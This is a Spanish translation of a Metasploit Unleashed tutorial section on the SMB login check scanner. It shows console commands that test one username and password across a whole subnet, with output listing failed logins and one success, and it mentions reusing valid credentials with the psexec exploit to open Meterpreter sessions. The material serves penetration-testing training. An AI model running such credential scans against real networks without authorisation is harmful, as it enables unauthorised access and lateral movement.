Metasploit Unleashed en Espanol (5.1/17)

8.1.10

Verificacion de Login SMB

Una situacion comun donde se puede encontrar usted, es con la posesion de un usuario y clave, se preguntara en donde mas prodria usarlo. Aqui es donde el escanner SMB Login Check puede ser muy util, ya que se conectara  a un rango de computadores (hosts) y determinara si la combinacion usuario/clave son validas con el objetivo.

Tenga en mente, que esto es muy "obvio", ya que mostrara los intentos fallidos en el visor de eventos (registros de logs). Tener cuidado en que red esta haciendo esto. Todos los intentos exitosos pueden ser conectados en el modulo de exploit windows/smb/psexec (exactamente como la herramienta) la cual es usada para crear sesiones de Meterpreter.

msf > use auxiliary/scanner/smb/login
msf auxiliary(login) >
show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        SMB Domain
   SMBPass                     no        SMB Password
   SMBUser    Administrator    no        SMB Username
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(login) >
set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(login) >
set SMBUser victim
SMBUser => victim
msf auxiliary(login) >
set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(login) >
set THREADS 50
THREADS => 50
msf auxiliary(login) >
run

[*] 192.168.1.100 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.111 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.114 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.125 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.116 - SUCCESSFUL LOGIN (Unix)
[*] Auxiliary module execution completed
msf auxiliary(login) > 



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

0 comentarios:

Creative Commons License
Esta obra está bajo una licencia de Creative Commons.